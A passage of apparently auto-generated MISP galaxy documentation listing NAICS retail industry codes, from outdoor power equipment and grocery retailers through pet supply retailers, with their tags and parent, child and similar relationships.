  • parent-of: misp-galaxy:naics="44423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="444240" with estimative-language:likelihood-probability="likely"

44423

Outdoor Power Equipment Retailers

The tag is: misp-galaxy:naics="44423"

44423 has relationships with:

  • child-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444230" with estimative-language:likelihood-probability="likely"

444230

Outdoor Power Equipment Retailers

The tag is: misp-galaxy:naics="444230"

444230 has relationships with:

  • child-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44423" with estimative-language:likelihood-probability="likely"

44424

Nursery, Garden Center, and Farm Supply Retailers

The tag is: misp-galaxy:naics="44424"

44424 has relationships with:

  • child-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444240" with estimative-language:likelihood-probability="likely"

444240

Nursery, Garden Center, and Farm Supply Retailers

The tag is: misp-galaxy:naics="444240"

444240 has relationships with:

  • child-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44424" with estimative-language:likelihood-probability="likely"

445

Food and Beverage Retailers

The tag is: misp-galaxy:naics="445"

445 has relationships with:

  • parent-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4453" with estimative-language:likelihood-probability="likely"

4451

Grocery and Convenience Retailers

The tag is: misp-galaxy:naics="4451"

4451 has relationships with:

  • child-of: misp-galaxy:naics="445" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445132" with estimative-language:likelihood-probability="likely"

44511

Supermarkets and Other Grocery Retailers (except Convenience Retailers)

The tag is: misp-galaxy:naics="44511"

44511 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445110" with estimative-language:likelihood-probability="likely"

445110

Supermarkets and Other Grocery Retailers (except Convenience Retailers)

The tag is: misp-galaxy:naics="445110"

445110 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44511" with estimative-language:likelihood-probability="likely"

44513

Convenience Retailers and Vending Machine Operators

The tag is: misp-galaxy:naics="44513"

44513 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

445131

Convenience Retailers

The tag is: misp-galaxy:naics="445131"

445131 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

445132

Vending Machine Operators

The tag is: misp-galaxy:naics="445132"

445132 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

4452

Specialty Food Retailers

The tag is: misp-galaxy:naics="4452"

4452 has relationships with:

  • child-of: misp-galaxy:naics="445" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445240" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44525" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445250" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44529" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445298" with estimative-language:likelihood-probability="likely"

44523

Fruit and Vegetable Retailers

The tag is: misp-galaxy:naics="44523"

44523 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445230" with estimative-language:likelihood-probability="likely"

445230

Fruit and Vegetable Retailers

The tag is: misp-galaxy:naics="445230"

445230 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44523" with estimative-language:likelihood-probability="likely"

44524

Meat Retailers

The tag is: misp-galaxy:naics="44524"

44524 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445240" with estimative-language:likelihood-probability="likely"

445240

Meat Retailers

The tag is: misp-galaxy:naics="445240"

445240 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44524" with estimative-language:likelihood-probability="likely"

44525

Fish and Seafood Retailers

The tag is: misp-galaxy:naics="44525"

44525 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445250" with estimative-language:likelihood-probability="likely"

445250

Fish and Seafood Retailers

The tag is: misp-galaxy:naics="445250"

445250 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44525" with estimative-language:likelihood-probability="likely"

44529

Other Specialty Food Retailers

The tag is: misp-galaxy:naics="44529"

44529 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

445291

Baked Goods Retailers

The tag is: misp-galaxy:naics="445291"

445291 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

445292

Confectionery and Nut Retailers

The tag is: misp-galaxy:naics="445292"

445292 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

445298

All Other Specialty Food Retailers

The tag is: misp-galaxy:naics="445298"

445298 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

4453

Beer, Wine, and Liquor Retailers

The tag is: misp-galaxy:naics="4453"

4453 has relationships with:

  • child-of: misp-galaxy:naics="445" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445320" with estimative-language:likelihood-probability="likely"

44532

Beer, Wine, and Liquor Retailers

The tag is: misp-galaxy:naics="44532"

44532 has relationships with:

  • child-of: misp-galaxy:naics="4453" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445320" with estimative-language:likelihood-probability="likely"

445320

Beer, Wine, and Liquor Retailers

The tag is: misp-galaxy:naics="445320"

445320 has relationships with:

  • child-of: misp-galaxy:naics="4453" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44532" with estimative-language:likelihood-probability="likely"

449

Furniture, Home Furnishings, Electronics, and Appliance Retailers

The tag is: misp-galaxy:naics="449"

449 has relationships with:

  • parent-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4492" with estimative-language:likelihood-probability="likely"

4491

Furniture and Home Furnishings Retailers

The tag is: misp-galaxy:naics="4491"

4491 has relationships with:

  • child-of: misp-galaxy:naics="449" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449129" with estimative-language:likelihood-probability="likely"

44911

Furniture Retailers

The tag is: misp-galaxy:naics="44911"

44911 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="449110" with estimative-language:likelihood-probability="likely"

449110

Furniture Retailers

The tag is: misp-galaxy:naics="449110"

449110 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44911" with estimative-language:likelihood-probability="likely"

44912

Home Furnishings Retailers

The tag is: misp-galaxy:naics="44912"

44912 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

449121

Floor Covering Retailers

The tag is: misp-galaxy:naics="449121"

449121 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

449122

Window Treatment Retailers

The tag is: misp-galaxy:naics="449122"

449122 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

449129

All Other Home Furnishings Retailers

The tag is: misp-galaxy:naics="449129"

449129 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

4492

Electronics and Appliance Retailers

The tag is: misp-galaxy:naics="4492"

4492 has relationships with:

  • child-of: misp-galaxy:naics="449" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449210" with estimative-language:likelihood-probability="likely"

44921

Electronics and Appliance Retailers

The tag is: misp-galaxy:naics="44921"

44921 has relationships with:

  • child-of: misp-galaxy:naics="4492" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="449210" with estimative-language:likelihood-probability="likely"

449210

Electronics and Appliance Retailers

The tag is: misp-galaxy:naics="449210"

449210 has relationships with:

  • child-of: misp-galaxy:naics="4492" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44921" with estimative-language:likelihood-probability="likely"

455

General Merchandise Retailers

The tag is: misp-galaxy:naics="455"

455 has relationships with:

  • parent-of: misp-galaxy:naics="4551" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4552" with estimative-language:likelihood-probability="likely"

4551

Department Stores

The tag is: misp-galaxy:naics="4551"

4551 has relationships with:

  • child-of: misp-galaxy:naics="455" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="455110" with estimative-language:likelihood-probability="likely"

45511

Department Stores

The tag is: misp-galaxy:naics="45511"

45511 has relationships with:

  • child-of: misp-galaxy:naics="4551" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="455110" with estimative-language:likelihood-probability="likely"

455110

Department Stores

The tag is: misp-galaxy:naics="455110"

455110 has relationships with:

  • child-of: misp-galaxy:naics="4551" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45511" with estimative-language:likelihood-probability="likely"

4552

Warehouse Clubs, Supercenters, and Other General Merchandise Retailers

The tag is: misp-galaxy:naics="4552"

4552 has relationships with:

  • child-of: misp-galaxy:naics="455" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="455211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="455219" with estimative-language:likelihood-probability="likely"

45521

Warehouse Clubs, Supercenters, and Other General Merchandise Retailers

The tag is: misp-galaxy:naics="45521"

45521 has relationships with:

  • child-of: misp-galaxy:naics="4552" with estimative-language:likelihood-probability="likely"

455211

Warehouse Clubs and Supercenters

The tag is: misp-galaxy:naics="455211"

455211 has relationships with:

  • child-of: misp-galaxy:naics="4552" with estimative-language:likelihood-probability="likely"

455219

All Other General Merchandise Retailers

The tag is: misp-galaxy:naics="455219"

455219 has relationships with:

  • child-of: misp-galaxy:naics="4552" with estimative-language:likelihood-probability="likely"

456

Health and Personal Care Retailers

The tag is: misp-galaxy:naics="456"

456 has relationships with:

  • parent-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

4561

Health and Personal Care Retailers

The tag is: misp-galaxy:naics="4561"

4561 has relationships with:

  • child-of: misp-galaxy:naics="456" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45619" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456199" with estimative-language:likelihood-probability="likely"

45611

Pharmacies and Drug Retailers

The tag is: misp-galaxy:naics="45611"

45611 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="456110" with estimative-language:likelihood-probability="likely"

456110

Pharmacies and Drug Retailers

The tag is: misp-galaxy:naics="456110"

456110 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45611" with estimative-language:likelihood-probability="likely"

45612

Cosmetics, Beauty Supplies, and Perfume Retailers

The tag is: misp-galaxy:naics="45612"

45612 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="456120" with estimative-language:likelihood-probability="likely"

456120

Cosmetics, Beauty Supplies, and Perfume Retailers

The tag is: misp-galaxy:naics="456120"

456120 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45612" with estimative-language:likelihood-probability="likely"

45613

Optical Goods Retailers

The tag is: misp-galaxy:naics="45613"

45613 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="456130" with estimative-language:likelihood-probability="likely"

456130

Optical Goods Retailers

The tag is: misp-galaxy:naics="456130"

456130 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45613" with estimative-language:likelihood-probability="likely"

45619

Other Health and Personal Care Retailers

The tag is: misp-galaxy:naics="45619"

45619 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

456191

Food (Health) Supplement Retailers

The tag is: misp-galaxy:naics="456191"

456191 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

456199

All Other Health and Personal Care Retailers

The tag is: misp-galaxy:naics="456199"

456199 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

457

Gasoline Stations and Fuel Dealers

The tag is: misp-galaxy:naics="457"

457 has relationships with:

  • parent-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4572" with estimative-language:likelihood-probability="likely"

4571

Gasoline Stations

The tag is: misp-galaxy:naics="4571"

4571 has relationships with:

  • child-of: misp-galaxy:naics="457" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="457110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="457120" with estimative-language:likelihood-probability="likely"

45711

Gasoline Stations with Convenience Stores

The tag is: misp-galaxy:naics="45711"

45711 has relationships with:

  • child-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="457110" with estimative-language:likelihood-probability="likely"

457110

Gasoline Stations with Convenience Stores

The tag is: misp-galaxy:naics="457110"

457110 has relationships with:

  • child-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45711" with estimative-language:likelihood-probability="likely"

45712

Other Gasoline Stations

The tag is: misp-galaxy:naics="45712"

45712 has relationships with:

  • child-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="457120" with estimative-language:likelihood-probability="likely"

457120

Other Gasoline Stations

The tag is: misp-galaxy:naics="457120"

457120 has relationships with:

  • child-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45712" with estimative-language:likelihood-probability="likely"

4572

Fuel Dealers

The tag is: misp-galaxy:naics="4572"

4572 has relationships with:

  • child-of: misp-galaxy:naics="457" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="457210" with estimative-language:likelihood-probability="likely"

45721

Fuel Dealers

The tag is: misp-galaxy:naics="45721"

45721 has relationships with:

  • child-of: misp-galaxy:naics="4572" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="457210" with estimative-language:likelihood-probability="likely"

457210

Fuel Dealers

The tag is: misp-galaxy:naics="457210"

457210 has relationships with:

  • child-of: misp-galaxy:naics="4572" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45721" with estimative-language:likelihood-probability="likely"

458

Clothing, Clothing Accessories, Shoe, and Jewelry Retailers

The tag is: misp-galaxy:naics="458"

458 has relationships with:

  • parent-of: misp-galaxy:naics="4581" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4582" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

4581

Clothing and Clothing Accessories Retailers

The tag is: misp-galaxy:naics="4581"

4581 has relationships with:

  • child-of: misp-galaxy:naics="458" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="458110" with estimative-language:likelihood-probability="likely"

45811

Clothing and Clothing Accessories Retailers

The tag is: misp-galaxy:naics="45811"

45811 has relationships with:

  • child-of: misp-galaxy:naics="4581" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="458110" with estimative-language:likelihood-probability="likely"

458110

Clothing and Clothing Accessories Retailers

The tag is: misp-galaxy:naics="458110"

458110 has relationships with:

  • child-of: misp-galaxy:naics="4581" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45811" with estimative-language:likelihood-probability="likely"

4582

Shoe Retailers

The tag is: misp-galaxy:naics="4582"

4582 has relationships with:

  • child-of: misp-galaxy:naics="458" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="458210" with estimative-language:likelihood-probability="likely"

45821

Shoe Retailers

The tag is: misp-galaxy:naics="45821"

45821 has relationships with:

  • child-of: misp-galaxy:naics="4582" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="458210" with estimative-language:likelihood-probability="likely"

458210

Shoe Retailers

The tag is: misp-galaxy:naics="458210"

458210 has relationships with:

  • child-of: misp-galaxy:naics="4582" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45821" with estimative-language:likelihood-probability="likely"

4583

Jewelry, Luggage, and Leather Goods Retailers

The tag is: misp-galaxy:naics="4583"

4583 has relationships with:

  • child-of: misp-galaxy:naics="458" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45831" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="458310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45832" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="458320" with estimative-language:likelihood-probability="likely"

45831

Jewelry Retailers

The tag is: misp-galaxy:naics="45831"

45831 has relationships with:

  • child-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="458310" with estimative-language:likelihood-probability="likely"

458310

Jewelry Retailers

The tag is: misp-galaxy:naics="458310"

458310 has relationships with:

  • child-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45831" with estimative-language:likelihood-probability="likely"

45832

Luggage and Leather Goods Retailers

The tag is: misp-galaxy:naics="45832"

45832 has relationships with:

  • child-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="458320" with estimative-language:likelihood-probability="likely"

458320

Luggage and Leather Goods Retailers

The tag is: misp-galaxy:naics="458320"

458320 has relationships with:

  • child-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45832" with estimative-language:likelihood-probability="likely"

459

Sporting Goods, Hobby, Musical Instrument, Book, and Miscellaneous Retailers

The tag is: misp-galaxy:naics="459"

459 has relationships with:

  • parent-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4592" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4593" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4595" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

4591

Sporting Goods, Hobby, and Musical Instrument Retailers

The tag is: misp-galaxy:naics="4591"

4591 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45913" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45914" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459140" with estimative-language:likelihood-probability="likely"

45911

Sporting Goods Retailers

The tag is: misp-galaxy:naics="45911"

45911 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459110" with estimative-language:likelihood-probability="likely"

459110

Sporting Goods Retailers

The tag is: misp-galaxy:naics="459110"

459110 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45911" with estimative-language:likelihood-probability="likely"

45912

Hobby, Toy, and Game Retailers

The tag is: misp-galaxy:naics="45912"

45912 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459120" with estimative-language:likelihood-probability="likely"

459120

Hobby, Toy, and Game Retailers

The tag is: misp-galaxy:naics="459120"

459120 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45912" with estimative-language:likelihood-probability="likely"

45913

Sewing, Needlework, and Piece Goods Retailers

The tag is: misp-galaxy:naics="45913"

45913 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459130" with estimative-language:likelihood-probability="likely"

459130

Sewing, Needlework, and Piece Goods Retailers

The tag is: misp-galaxy:naics="459130"

459130 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45913" with estimative-language:likelihood-probability="likely"

45914

Musical Instrument and Supplies Retailers

The tag is: misp-galaxy:naics="45914"

45914 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459140" with estimative-language:likelihood-probability="likely"

459140

Musical Instrument and Supplies Retailers

The tag is: misp-galaxy:naics="459140"

459140 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45914" with estimative-language:likelihood-probability="likely"

4592

Book Retailers and News Dealers

The tag is: misp-galaxy:naics="4592"

4592 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459210" with estimative-language:likelihood-probability="likely"

45921

Book Retailers and News Dealers

The tag is: misp-galaxy:naics="45921"

45921 has relationships with:

  • child-of: misp-galaxy:naics="4592" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459210" with estimative-language:likelihood-probability="likely"

459210

Book Retailers and News Dealers

The tag is: misp-galaxy:naics="459210"

459210 has relationships with:

  • child-of: misp-galaxy:naics="4592" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45921" with estimative-language:likelihood-probability="likely"

4593

Florists

The tag is: misp-galaxy:naics="4593"

4593 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45931" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459310" with estimative-language:likelihood-probability="likely"

45931

Florists

The tag is: misp-galaxy:naics="45931"

45931 has relationships with:

  • child-of: misp-galaxy:naics="4593" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459310" with estimative-language:likelihood-probability="likely"

459310

Florists

The tag is: misp-galaxy:naics="459310"

459310 has relationships with:

  • child-of: misp-galaxy:naics="4593" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45931" with estimative-language:likelihood-probability="likely"

4594

Office Supplies, Stationery, and Gift Retailers

The tag is: misp-galaxy:naics="4594"

4594 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45941" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45942" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459420" with estimative-language:likelihood-probability="likely"

45941

Office Supplies and Stationery Retailers

The tag is: misp-galaxy:naics="45941"

45941 has relationships with:

  • child-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459410" with estimative-language:likelihood-probability="likely"

459410

Office Supplies and Stationery Retailers

The tag is: misp-galaxy:naics="459410"

459410 has relationships with:

  • child-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45941" with estimative-language:likelihood-probability="likely"

45942

Gift, Novelty, and Souvenir Retailers

The tag is: misp-galaxy:naics="45942"

45942 has relationships with:

  • child-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459420" with estimative-language:likelihood-probability="likely"

459420

Gift, Novelty, and Souvenir Retailers

The tag is: misp-galaxy:naics="459420"

459420 has relationships with:

  • child-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45942" with estimative-language:likelihood-probability="likely"

4595

Used Merchandise Retailers

The tag is: misp-galaxy:naics="4595"

4595 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45951" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459510" with estimative-language:likelihood-probability="likely"

45951

Used Merchandise Retailers

The tag is: misp-galaxy:naics="45951"

45951 has relationships with:

  • child-of: misp-galaxy:naics="4595" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459510" with estimative-language:likelihood-probability="likely"

459510

Used Merchandise Retailers

The tag is: misp-galaxy:naics="459510"

459510 has relationships with:

  • child-of: misp-galaxy:naics="4595" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45951" with estimative-language:likelihood-probability="likely"

4599

Other Miscellaneous Retailers

The tag is: misp-galaxy:naics="4599"

4599 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45999" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459999" with estimative-language:likelihood-probability="likely"

45991

Pet and Pet Supplies Retailers

The tag is: misp-galaxy:naics="45991"

45991 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459910" with estimative-language:likelihood-probability="likely"

459910

Pet and Pet Supplies Retailers

The tag is: misp-galaxy:naics="459910"

459910 has relationships with:

